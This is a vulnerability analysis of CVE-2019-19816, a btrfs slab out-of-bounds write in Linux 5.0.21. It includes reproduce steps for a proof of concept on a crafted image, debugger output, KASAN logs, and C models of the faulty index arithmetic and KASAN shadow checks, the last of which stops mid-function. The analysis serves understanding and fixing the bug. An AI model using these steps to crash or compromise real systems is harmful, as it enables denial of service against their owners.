CVE-2019-19816

Target

Linux kernel btrfs filesystem

Linux Version    Availability
5.0.21           True

Bug Type

out-of-bounds write (slab)

Abstract

With a crafted btrfs filesystem image mounted, ordinary file operations followed by fsync() (see the trace below: fsync -> transaction commit -> metadata writeback) cause a slab-out-of-bounds write in __btrfs_map_block.

Reproduce

gcc -o poc poc_2019_19816.c
mkdir mnt
mount poc_2019_19816.img ./mnt
cp poc ./mnt
cd mnt
./poc

Details

Debug view

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0000000000000000  →  0x0000000000000000
$rbx   : 0x0000000000000001  →  0x0000000000000001
$rcx   : 0xffffffff816a1b16  →  0x005d894824048b48  →  0x005d894824048b48
$rdx   : 0x0000000000000001  →  0x0000000000000001
$rsp   : 0xffff88806353f470  →  0xffff888066d49000  →  0x0000000000000001  →  0x0000000000000001
$rbp   : 0xffff888066d49080  →  0xa64000ac00000752  →  0xa64000ac00000752
$rsi   : 0x0000000000000002  →  0x0000000000000002
$rdi   : 0xffff888066d49078  →  0x0000000001400000  →  0x0000000001400000
$rip   : 0xffffffff816a1b7a  →  0xffc1921ee8ef8948  →  0xffc1921ee8ef8948
$r8    : 0xffffed100cda9201  →  0x0000000000000000  →  0x0000000000000000
$r9    : 0xffffed100cda9201  →  0x0000000000000000  →  0x0000000000000000
$r10   : 0x0000000000000001  →  0x0000000000000001
$r11   : 0xffffed100cda9200  →  0x0000000000000000  →  0x0000000000000000
$r12   : 0x0000000000000000  →  0x0000000000000000
$r13   : 0x0000000000000001  →  0x0000000000000001
$r14   : 0x0000000000000001  →  0x0000000000000001
$r15   : 0x0000000000000000  →  0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0010 $ss: 0x0018 $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffff88806353f470│+0x0000: 0xffff888066d49000  →  0x0000000000000001  →  0x0000000000000001	 ← $rsp
0xffff88806353f478│+0x0008: 0xffff88806ca9fe10  →  0x0000000000010000  →  0x0000000000010000
0xffff88806353f480│+0x0010: 0x0000000000000000  →  0x0000000000000000
0xffff88806353f488│+0x0018: 0xffff888067908018  →  0x0000000001400000  →  0x0000000001400000
0xffff88806353f490│+0x0020: 0x0000000000000000  →  0x0000000000000000
0xffff88806353f498│+0x0028: 0x0000000000000001  →  0x0000000000000001
0xffff88806353f4a0│+0x0030: 0xffff888066d49058  →  0xffff888066d49078  →  0x0000000001400000  →  0x0000000001400000
0xffff88806353f4a8│+0x0038: 0x0000000000000000  →  0x0000000000000000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff816a1b71 <__btrfs_map_block+1233> div    esi
   0xffffffff816a1b73 <__btrfs_map_block+1235> mov    edx, edx
   0xffffffff816a1b75 <__btrfs_map_block+1237> lea    rbp, [rbp+rdx*8+0x0]
 → 0xffffffff816a1b7a <__btrfs_map_block+1242> mov    rdi, rbp
   0xffffffff816a1b7d <__btrfs_map_block+1245> call   0xffffffff812bada0 <__asan_store8>
   0xffffffff816a1b82 <__btrfs_map_block+1250> mov    rax, QWORD PTR [rsp+0x48]
   0xffffffff816a1b87 <__btrfs_map_block+1255> mov    QWORD PTR [rbp+0x0], 0xfffffffffffffffe
   0xffffffff816a1b8f <__btrfs_map_block+1263> mov    rax, QWORD PTR [rax]
   0xffffffff816a1b92 <__btrfs_map_block+1266> test   ah, 0x1
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:fs/btrfs/volumes.c+6247 ────
   6242	 		tmp = stripe_nr * nr_data_stripes(map);
   6243	 		for (i = 0; i < nr_data_stripes(map); i++)
   6244	 			bbio->raid_map[(i+rot) % num_stripes] =
   6245	 				em->start + (tmp + i) * map->stripe_len;
   6246
[1] → 6247	 		bbio->raid_map[(i+rot) % map->num_stripes] = RAID5_P_STRIPE;
   6248	 		if (map->type & BTRFS_BLOCK_GROUP_RAID6)
   6249	 			bbio->raid_map[(i+rot+1) % num_stripes] =
   6250	 				RAID6_Q_STRIPE;
   6251	 	}
   6252
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff816a1b7a in __btrfs_map_block (), reason: SINGLE STEP
[#1] Id 2, stopped 0xffffffff812bad33 in memory_is_poisoned_2_4_8 (), reason: SINGLE STEP
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff816a1b7a → __btrfs_map_block(fs_info=<optimized out>, op=<optimized out>, logical=<optimized out>, length=<optimized out>, bbio_ret=<optimized out>, mirror_num=<optimized out>, need_raid_map=0x1)
[#1] 0xffffffff816a37cf → btrfs_map_bio(fs_info=0xffff88806a245500, bio=0xffff888065d064f0, mirror_num=0x0, async_submit=<optimized out>)
[#2] 0xffffffff8164e592 → btree_submit_bio_hook(private_data=<optimized out>, bio=0xffff888065d064f0, mirror_num=0x0, bio_flags=<optimized out>, bio_offset=0x1400000)
[#3] 0xffffffff8168ad59 → submit_one_bio(bio=0xffff888065d064f0, mirror_num=0x0, bio_flags=0x0)
[#4] 0xffffffff8168b2aa → flush_write_bio(epd=<optimized out>)
[#5] 0xffffffff81697014 → btree_write_cache_pages(mapping=<optimized out>, wbc=0xffff88806353fa48)
[#6] 0xffffffff8123c54d → do_writepages(mapping=0xffff8880683c4388, wbc=0xffff88806353fa48)
[#7] 0xffffffff81224eb8 → __filemap_fdatawrite_range(mapping=0xffff8880683c4388, start=<optimized out>, end=<optimized out>, sync_mode=<optimized out>)
[#8] 0xffffffff81224fda → filemap_fdatawrite_range(mapping=<optimized out>, start=<optimized out>, end=<optimized out>)
[#9] 0xffffffff81658f1d → btrfs_write_marked_extents(fs_info=0xffff88806a245500, dirty_pages=0xffff8880692a8cb8, mark=0x1)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

At line [1] in this view, (i+rot) % map->num_stripes evaluates to 1: the div esi ran with rsi = 2 and left the remainder 1 in rdx, and i (rbx) is 1. raid_map starts at 0xffff888066d49078 (rdi), so the lea computes the slot at 0xffff888066d49080, which is the first byte past the 128-byte kmalloc object that holds the bbio.

The __asan_store8 call that follows reports this 8-byte store as a slab-out-of-bounds write (see the KASAN log below).

Bug causes

static int __btrfs_map_block(struct btrfs_fs_info *fs_info,
			     enum btrfs_map_op op,
			     u64 logical, u64 *length,
			     struct btrfs_bio **bbio_ret,
			     int mirror_num, int need_raid_map)
{
	...

	/* build raid_map */
	if (map->type & BTRFS_BLOCK_GROUP_RAID56_MASK && need_raid_map &&
	    (need_full_stripe(op) || mirror_num > 1)) {
		u64 tmp;
		unsigned rot;

		bbio->raid_map = (u64 *)((void *)bbio->stripes +
				 sizeof(struct btrfs_bio_stripe) *
				 num_alloc_stripes +
				 sizeof(int) * tgtdev_indexes);

		/* Work out the disk rotation on this stripe-set */
		div_u64_rem(stripe_nr, num_stripes, &rot);

		/* Fill in the logical address of each stripe */
		tmp = stripe_nr * nr_data_stripes(map);
[1]		for (i = 0; i < nr_data_stripes(map); i++)
			bbio->raid_map[(i+rot) % num_stripes] =
				em->start + (tmp + i) * map->stripe_len;

[2]		bbio->raid_map[(i+rot) % map->num_stripes] = RAID5_P_STRIPE;
		...

In the loop at [1], nr_data_stripes(map) returns 1, so a single data-stripe entry is written and the loop exits with i == 1.

At [2] the parity entry is then stored at index (i+rot) % map->num_stripes, which is 1 here, but the bbio (and the raid_map placed at its tail, after the stripes and tgtdev arrays) was allocated with room for only one raid_map entry, so the store at index 1 lands one slot past the end of the allocation. Note the two different divisors: [1] reduces its index modulo the local num_stripes, while [2] reduces modulo map->num_stripes, the stripe count recorded in the on-disk chunk item. The debug view shows that divisor is 2 while the allocation holds a single raid_map slot, and that mismatch is what the crafted image produces.
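To make the index arithmetic concrete, here is a small C model of the raid_map construction quoted above. It is an added example written for this page, not kernel code and not from the bobfuzzer repository: struct raid_params, put_slot() and build_raid_map() are constructed names, the page's two divisors (num_stripes at [1], map->num_stripes at [2]) are kept as separate inputs, and every store is checked against the number of raid_map slots actually allocated, which is the check the kernel snippet does not make. The page-observed case takes its numbers from the debug view (divisor 2, i = 1, remainder 1, one raid_map slot between 0x...078 and the end of the 128-byte object, raid_map[0] = 0x1400000); num_stripes = 1 for that case is an assumption consistent with the one-slot allocation.

```c
#include <stdint.h>
#include <stdio.h>

/* Parity markers stored in raid_map; same values as the kernel's RAID5_P_STRIPE
 * and RAID6_Q_STRIPE (the 0xfffffffffffffffe store is visible in the disassembly). */
#define RAID5_P_STRIPE ((uint64_t)-2)
#define RAID6_Q_STRIPE ((uint64_t)-1)

/* Constructed inputs. In the kernel these come from the chunk map (map->*), the
 * request (stripe_nr) and the bbio allocation. num_stripes and map_num_stripes
 * are kept separate because the quoted snippet uses one at [1] and the other at [2]. */
struct raid_params {
    int map_num_stripes;   /* map->num_stripes, from the on-disk chunk item */
    int num_stripes;       /* local num_stripes, used by the loop and for rot */
    int nr_data_stripes;   /* nr_data_stripes(map) */
    int raid6;             /* nonzero when map->type has BTRFS_BLOCK_GROUP_RAID6 */
    uint64_t stripe_nr;
    uint64_t stripe_len;
    uint64_t em_start;
};

/* Record one intended store. A slot at or past nslots is counted in *overflow
 * instead of being written; this is exactly the check the kernel code lacks. */
static void put_slot(uint64_t *raid_map, int nslots, int idx, uint64_t val,
                     int *max_idx, int *overflow)
{
    if (idx > *max_idx)
        *max_idx = idx;
    if (idx < 0 || idx >= nslots) {
        *overflow = 1;
        return;
    }
    raid_map[idx] = val;
}

/* Replay the snippet's index arithmetic against a raid_map of nslots entries.
 * Returns the highest index the unchecked kernel code would have stored to
 * (-1 for invalid stripe counts); *overflow becomes 1 if any store would have
 * landed outside the allocation. */
int build_raid_map(const struct raid_params *p, uint64_t *raid_map,
                   int nslots, int *overflow)
{
    int i, max_idx = -1;
    unsigned rot;
    uint64_t tmp;

    *overflow = 0;
    if (p->num_stripes <= 0 || p->map_num_stripes <= 0 || p->nr_data_stripes < 0)
        return -1;

    rot = (unsigned)(p->stripe_nr % (uint64_t)p->num_stripes);  /* div_u64_rem() */
    tmp = p->stripe_nr * (uint64_t)p->nr_data_stripes;

    for (i = 0; i < p->nr_data_stripes; i++)                    /* line [1] */
        put_slot(raid_map, nslots, (int)((i + rot) % p->num_stripes),
                 p->em_start + (tmp + i) * p->stripe_len, &max_idx, overflow);

    /* line [2]: the divisor here is map->num_stripes, not num_stripes */
    put_slot(raid_map, nslots, (int)((i + rot) % p->map_num_stripes),
             RAID5_P_STRIPE, &max_idx, overflow);
    if (p->raid6)
        put_slot(raid_map, nslots, (int)((i + rot + 1) % p->num_stripes),
                 RAID6_Q_STRIPE, &max_idx, overflow);
    return max_idx;
}

/* Parameters read off the debug view: divisor at [2] was 2 (rsi), i was 1 (rbx),
 * the remainder 1 (rdx), raid_map started 8 bytes before the end of the 128-byte
 * object (one slot), and raid_map[0] held 0x1400000. nr_data_stripes is 1 as the
 * page states; num_stripes = 1 is an assumption matching the one-slot allocation. */
int page_observed_case(void)
{
    uint64_t raid_map[1] = {0};
    int overflow;
    struct raid_params p = {
        .map_num_stripes = 2, .num_stripes = 1, .nr_data_stripes = 1, .raid6 = 0,
        .stripe_nr = 0, .stripe_len = 65536, .em_start = 0x1400000,
    };
    build_raid_map(&p, raid_map, 1, &overflow);
    return overflow;            /* 1: the parity store targets slot 1 of 1 */
}

/* A self-consistent three-device RAID5 map with a bbio sized for every stripe. */
int consistent_case(void)
{
    uint64_t raid_map[3] = {0};
    int overflow;
    struct raid_params p = {
        .map_num_stripes = 3, .num_stripes = 3, .nr_data_stripes = 2, .raid6 = 0,
        .stripe_nr = 5, .stripe_len = 65536, .em_start = 0x1400000,
    };
    build_raid_map(&p, raid_map, 3, &overflow);
    return overflow;            /* 0 */
}

int main(void)
{
    printf("page-observed parameters: overflow=%d\n", page_observed_case());
    printf("consistent RAID5 map:     overflow=%d\n", consistent_case());
    return 0;
}
```

The model deliberately does not try to explain how the crafted image makes map->num_stripes disagree with the allocation; it only shows that once the parity index is reduced modulo a larger stripe count than the one the bbio was sized for, the write at [2] must leave the object, and that a bounds check on the slot index (or a consistency check between the two stripe counts before allocating) would stop it.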

KASAN logs

[  393.376653] ==================================================================
[  393.376653] BUG: KASAN: slab-out-of-bounds in __btrfs_map_block+0x4e2/0x1980
[  393.376653] Write of size 8 at addr ffff888066d49080 by task 263/1874
[  393.376653]
[  393.376653] CPU: 0 PID: 1874 Comm: 263 Not tainted 5.0.21 #2
[  393.376653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  393.376653] Call Trace:
[  393.376653]  dump_stack+0x5b/0x8b
[  393.376653]  print_address_description+0x70/0x280
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  kasan_report+0x13a/0x19b
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  ? __btrfs_map_block+0x4e2/0x1980
[  393.376653]  __btrfs_map_block+0x4e2/0x1980
[  393.376653]  ? btrfs_put_bbio+0x20/0x20
[  393.376653]  ? btrfs_bio_counter_inc_blocked+0xa0/0x160
[  393.376653]  ? btrfs_bio_counter_sub+0x70/0x70
[  393.376653]  ? bvec_alloc+0x8b/0x160
[  393.376653]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.376653]  btrfs_map_bio+0x12f/0x650
[  393.376653]  ? btrfs_rmap_block+0x3a0/0x3a0
[  393.376653]  ? btree_csum_one_bio.isra.42+0x145/0x160
[  393.376653]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.376653]  btree_submit_bio_hook+0xe2/0x130
[  393.376653]  submit_one_bio+0xc9/0x100
[  393.376653]  flush_write_bio.isra.41+0x1a/0x40
[  393.376653]  btree_write_cache_pages+0x394/0x530
[  393.376653]  ? write_one_eb+0x3a0/0x3a0
[  393.376653]  ? __sched_text_start+0x8/0x8
[  393.376653]  ? kasan_unpoison_shadow+0x31/0x40
[  393.376653]  ? rb_next+0x4f/0x80
[  393.376653]  ? merge_state.part.45+0x7d/0x250
[  393.376653]  ? __kasan_slab_free+0x147/0x180
[  393.376653]  ? convert_extent_bit+0x4f8/0x6b0
[  393.376653]  ? kmem_cache_free+0x70/0x190
[  393.376653]  ? convert_extent_bit+0x4f8/0x6b0
[  393.376653]  do_writepages+0x2d/0xa0
[  393.376653]  __filemap_fdatawrite_range+0xf8/0x160
[  393.376653]  ? delete_from_page_cache_batch+0x4a0/0x4a0
[  393.376653]  ? btrfs_commit_transaction+0x7da/0xf90
[  393.376653]  ? find_first_extent_bit+0xe6/0x1b0
[  393.376653]  btrfs_write_marked_extents+0x24d/0x260
[  393.376653]  ? btrfs_should_end_transaction+0x80/0x80
[  393.376653]  ? _raw_write_lock_irqsave+0xf0/0xf0
[  393.376653]  ? _raw_read_lock_irq+0x30/0x30
[  393.376653]  ? __wake_up_common+0x4a/0x1d0
[  393.376653]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.376653]  ? btrfs_wait_extents+0x40/0x40
[  393.376653]  ? btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  ? btrfs_apply_pending_changes+0x80/0x80
[  393.376653]  ? up_write+0xd/0x30
[  393.376653]  btrfs_sync_file+0x5b3/0x600
[  393.376653]  ? start_ordered_ops+0x120/0x120
[  393.376653]  ? vfs_read+0x122/0x190
[  393.376653]  ? ksys_read+0x131/0x160
[  393.376653]  ? kernel_write+0x90/0x90
[  393.376653]  ? vfs_fsync_range+0x81/0x100
[  393.376653]  do_fsync+0x33/0x60
[  393.376653]  __x64_sys_fsync+0x18/0x20
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653] RIP: 0033:0x7f1fb191e469
[  393.376653] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ff 49 2b 00 f7 d8 64 89 01 48
[  393.376653] RSP: 002b:00007ffe703b9708 EFLAGS: 00000217 ORIG_RAX: 000000000000004a
[  393.376653] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f1fb191e469
[  393.376653] RDX: 00007f1fb191e469 RSI: 0000000000001c52 RDI: 0000000000000003
[  393.376653] RBP: 00007ffe703bb7b0 R08: 00007ffe703bb898 R09: 00007ffe703bb898
[  393.376653] R10: 00007ffe703bb898 R11: 0000000000000217 R12: 000055ebba9005f0
[  393.376653] R13: 00007ffe703bb890 R14: 0000000000000000 R15: 0000000000000000
[  393.376653]
[  393.376653] Allocated by task 1874:
[  393.376653]  __kasan_kmalloc+0xd5/0xf0
[  393.376653]  alloc_btrfs_bio+0x1b/0x60
[  393.376653]  __btrfs_map_block+0xe9a/0x1980
[  393.376653]  btrfs_map_bio+0x12f/0x650
[  393.376653]  btree_submit_bio_hook+0xe2/0x130
[  393.376653]  submit_one_bio+0xc9/0x100
[  393.376653]  flush_write_bio.isra.41+0x1a/0x40
[  393.376653]  btree_write_cache_pages+0x394/0x530
[  393.376653]  do_writepages+0x2d/0xa0
[  393.376653]  __filemap_fdatawrite_range+0xf8/0x160
[  393.376653]  btrfs_write_marked_extents+0x24d/0x260
[  393.376653]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.376653]  btrfs_commit_transaction+0xbcb/0xf90
[  393.376653]  btrfs_sync_file+0x5b3/0x600
[  393.376653]  do_fsync+0x33/0x60
[  393.376653]  __x64_sys_fsync+0x18/0x20
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653]
[  393.376653] Freed by task 1835:
[  393.376653]  __kasan_slab_free+0x132/0x180
[  393.376653]  kfree+0x8c/0x1a0
[  393.376653]  blk_rq_unmap_user+0x34/0x70
[  393.376653]  sg_io+0x466/0x680
[  393.376653]  scsi_cmd_ioctl+0x362/0x4e0
[  393.376653]  cdrom_ioctl+0x106/0x1419
[  393.376653]  sr_block_ioctl+0xc0/0xf0
[  393.376653]  blkdev_ioctl+0x8e7/0xdb0
[  393.376653]  block_ioctl+0x68/0x80
[  393.376653]  do_vfs_ioctl+0x139/0x8c0
[  393.376653]  ksys_ioctl+0x61/0x70
[  393.376653]  __x64_sys_ioctl+0x38/0x40
[  393.376653]  do_syscall_64+0x5e/0x150
[  393.376653]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.376653]
[  393.376653] The buggy address belongs to the object at ffff888066d49000
[  393.376653]  which belongs to the cache kmalloc-128 of size 128
[  393.376653] The buggy address is located 0 bytes to the right of
[  393.376653]  128-byte region [ffff888066d49000, ffff888066d49080)
[  393.376653] The buggy address belongs to the page:
[  393.376653] page:ffffea00019b5240 count:1 mapcount:0 mapping:ffff88806d001640 index:0x0
[  393.376653] flags: 0x100000000000200(slab)
[  393.376653] raw: 0100000000000200 ffffea0001a98040 0000001700000017 ffff88806d001640
[  393.376653] raw: 0000000000000000 0000000080150015 00000001ffffffff 0000000000000000
[  393.376653] page dumped because: kasan: bad access detected
[  393.376653]
[  393.376653] Memory state around the buggy address:
[  393.376653]  ffff888066d48f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  393.376653]  ffff888066d49000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  393.376653] >ffff888066d49080: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[  393.376653]                    ^
[  393.376653]  ffff888066d49100: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[  393.376653]  ffff888066d49180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  393.376653] ==================================================================
[  393.376653] Disabling lock debugging due to kernel taint
[  393.754098] ------------[ cut here ]------------
[  393.754098] kernel BUG at fs/btrfs/raid56.c:522!
[  393.754098] invalid opcode: 0000 [#1] SMP KASAN NOPTI
[  393.754098] CPU: 0 PID: 1874 Comm: 263 Tainted: G    B             5.0.21 #2
[  393.754098] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[  393.754098] RIP: 0010:rbio_is_full+0x81/0x90
[  393.754098] Code: ed 49 39 ed 74 1d bb 00 00 00 00 77 1d 4c 89 f6 4c 89 e7 e8 71 9e ca 00 89 d8 5b 5d 41 5c 41 5d 41 5e c3 bb 01 00 00 00 eb e3 <0f> 0b 0f 1f 00 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 49 89 fe
[  393.754098] RSP: 0018:ffff88806353f598 EFLAGS: 00000006
[  393.754098] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8171f16e
[  393.754098] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8880699f2938
[  393.754098] RBP: 0000000000000000 R08: 1ffff1100c6a7ea7 R09: ffffed100c6a7ea7
[  393.754098] R10: 0000000000000001 R11: ffffed100c6a7ea7 R12: ffff8880699f2918
[  393.754098] R13: 0000000000001000 R14: 0000000000000246 R15: ffff888066d49004
[  393.754098] FS:  00007f1fb1df7440(0000) GS:ffff88806d400000(0000) knlGS:0000000000000000
[  393.754098] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  393.754098] CR2: 00007f3e68868000 CR3: 00000000678e2000 CR4: 00000000000006f0
[  393.754098] Call Trace:
[  393.754098]  raid56_parity_write+0xd1/0x210
[  393.754098]  btrfs_map_bio+0x620/0x650
[  393.754098]  ? btrfs_rmap_block+0x3a0/0x3a0
[  393.754098]  ? btree_csum_one_bio.isra.42+0x145/0x160
[  393.754098]  ? btrfs_wq_submit_bio+0x120/0x120
[  393.754098]  btree_submit_bio_hook+0xe2/0x130
[  393.754098]  submit_one_bio+0xc9/0x100
[  393.754098]  flush_write_bio.isra.41+0x1a/0x40
[  393.754098]  btree_write_cache_pages+0x394/0x530
[  393.754098]  ? write_one_eb+0x3a0/0x3a0
[  393.754098]  ? __sched_text_start+0x8/0x8
[  393.754098]  ? kasan_unpoison_shadow+0x31/0x40
[  393.754098]  ? rb_next+0x4f/0x80
[  393.754098]  ? merge_state.part.45+0x7d/0x250
[  393.754098]  ? __kasan_slab_free+0x147/0x180
[  393.754098]  ? convert_extent_bit+0x4f8/0x6b0
[  393.754098]  ? kmem_cache_free+0x70/0x190
[  393.754098]  ? convert_extent_bit+0x4f8/0x6b0
[  393.754098]  do_writepages+0x2d/0xa0
[  393.754098]  __filemap_fdatawrite_range+0xf8/0x160
[  393.754098]  ? delete_from_page_cache_batch+0x4a0/0x4a0
[  393.754098]  ? btrfs_commit_transaction+0x7da/0xf90
[  393.754098]  ? find_first_extent_bit+0xe6/0x1b0
[  393.754098]  btrfs_write_marked_extents+0x24d/0x260
[  393.754098]  ? btrfs_should_end_transaction+0x80/0x80
[  393.754098]  ? _raw_write_lock_irqsave+0xf0/0xf0
[  393.754098]  ? _raw_read_lock_irq+0x30/0x30
[  393.754098]  ? __wake_up_common+0x4a/0x1d0
[  393.754098]  btrfs_write_and_wait_transaction.isra.21+0xab/0x120
[  393.754098]  ? btrfs_wait_extents+0x40/0x40
[  393.754098]  ? btrfs_commit_transaction+0xbcb/0xf90
[  393.754098]  btrfs_commit_transaction+0xbcb/0xf90
[  393.754098]  ? btrfs_apply_pending_changes+0x80/0x80
[  393.754098]  ? up_write+0xd/0x30
[  393.754098]  btrfs_sync_file+0x5b3/0x600
[  393.754098]  ? start_ordered_ops+0x120/0x120
[  393.754098]  ? vfs_read+0x122/0x190
[  393.754098]  ? ksys_read+0x131/0x160
[  393.754098]  ? kernel_write+0x90/0x90
[  393.754098]  ? vfs_fsync_range+0x81/0x100
[  393.754098]  do_fsync+0x33/0x60
[  393.754098]  __x64_sys_fsync+0x18/0x20
[  393.754098]  do_syscall_64+0x5e/0x150
[  393.754098]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  393.754098] RIP: 0033:0x7f1fb191e469
[  393.754098] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ff 49 2b 00 f7 d8 64 89 01 48
[  393.754098] RSP: 002b:00007ffe703b9708 EFLAGS: 00000217 ORIG_RAX: 000000000000004a
[  393.754098] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f1fb191e469
[  393.754098] RDX: 00007f1fb191e469 RSI: 0000000000001c52 RDI: 0000000000000003
[  393.754098] RBP: 00007ffe703bb7b0 R08: 00007ffe703bb898 R09: 00007ffe703bb898
[  393.754098] R10: 00007ffe703bb898 R11: 0000000000000217 R12: 000055ebba9005f0
[  393.754098] R13: 00007ffe703bb890 R14: 0000000000000000 R15: 0000000000000000
[  393.754098] Modules linked in:
[  393.754098] ---[ end trace 9f5b48be7c76db7a ]---
[  393.754098] RIP: 0010:rbio_is_full+0x81/0x90
[  393.754098] Code: ed 49 39 ed 74 1d bb 00 00 00 00 77 1d 4c 89 f6 4c 89 e7 e8 71 9e ca 00 89 d8 5b 5d 41 5c 41 5d 41 5e c3 bb 01 00 00 00 eb e3 <0f> 0b 0f 1f 00 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 49 89 fe
[  393.754098] RSP: 0018:ffff88806353f598 EFLAGS: 00000006
[  393.754098] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8171f16e
[  393.754098] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8880699f2938
[  393.754098] RBP: 0000000000000000 R08: 1ffff1100c6a7ea7 R09: ffffed100c6a7ea7
[  393.754098] R10: 0000000000000001 R11: ffffed100c6a7ea7 R12: ffff8880699f2918
[  393.754098] R13: 0000000000001000 R14: 0000000000000246 R15: ffff888066d49004
[  393.754098] FS:  00007f1fb1df7440(0000) GS:ffff88806d400000(0000) knlGS:0000000000000000
[  393.754098] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  393.754098] CR2: 00007f3e68868000 CR3: 00000000678e2000 CR4: 00000000000006f0
Segmentation fault
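The KASAN report above can be checked by hand with the shadow-memory arithmetic generic KASAN uses on x86_64. The following C program is an added example, not part of this page, the bobfuzzer repository or the kernel: kasan_shadow_addr(), shadow_byte_for(), shadow_kind() and kasan_check_access() are constructed names, the shadow rows are copied from the "Memory state around the buggy address" block, and the shadow offset, scale and poison values are the kernel's. It shows that the shadow address of the object base, 0xffffed100cda9200, is the value held in r11 in the debug view, that R8/R9 in the later rbio_is_full oops are the same addr >> 3 / shadow pair for a stack address, and that the 8-byte store at 0xffff888066d49080 hits a 0xfc (kmalloc redzone) shadow byte, which is why KASAN classifies it as slab-out-of-bounds.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Generic KASAN on x86_64: one shadow byte per 8-byte granule, located at
 * (addr >> 3) + KASAN_SHADOW_OFFSET. Both constants are the kernel's. */
#define KASAN_SHADOW_SCALE_SHIFT 3
#define KASAN_SHADOW_OFFSET      0xdffffc0000000000ULL

/* Slab-related poison values from the kernel's mm/kasan/kasan.h. */
#define KASAN_KMALLOC_REDZONE 0xFC   /* redzone inside a slab object */
#define KASAN_KMALLOC_FREE    0xFB   /* object freed with kfree/kmem_cache_free */
#define KASAN_PAGE_REDZONE    0xFE   /* redzone of a kmalloc_large allocation */
#define KASAN_FREE_PAGE       0xFF   /* freed page */

uint64_t kasan_shadow_addr(uint64_t addr)
{
    return (addr >> KASAN_SHADOW_SCALE_SHIFT) + KASAN_SHADOW_OFFSET;
}

/* One "Memory state around the buggy address" row: 16 shadow bytes describing
 * the 128 bytes of memory that start at base. */
struct shadow_row {
    uint64_t base;
    uint8_t  shadow[16];
};

/* The rows copied from the KASAN report on this page (not generated). */
static const struct shadow_row report_rows[] = {
    { 0xffff888066d48f80ULL, { 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0 } },
    { 0xffff888066d49000ULL, { 0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0 } },
    { 0xffff888066d49080ULL, { 0xfc,0xfc,0xfc,0xfc,0xfc,0xfc,0xfc,0xfc,
                               0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb } },
    { 0xffff888066d49100ULL, { 0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,
                               0xfc,0xfc,0xfc,0xfc,0xfc,0xfc,0xfc,0xfc } },
    { 0xffff888066d49180ULL, { 0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,
                               0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb,0xfb } },
};

/* Shadow byte covering addr, or -1 when addr is outside the quoted rows. */
int shadow_byte_for(uint64_t addr)
{
    size_t n = sizeof(report_rows) / sizeof(report_rows[0]);
    for (size_t r = 0; r < n; r++) {
        uint64_t base = report_rows[r].base;
        if (addr >= base && addr < base + 128)
            return report_rows[r].shadow[(addr - base) >> KASAN_SHADOW_SCALE_SHIFT];
    }
    return -1;
}

const char *shadow_kind(int s)
{
    if (s < 0)  return "outside quoted rows";
    if (s == 0) return "addressable";
    if (s <= 7) return "partially addressable (first s bytes)";
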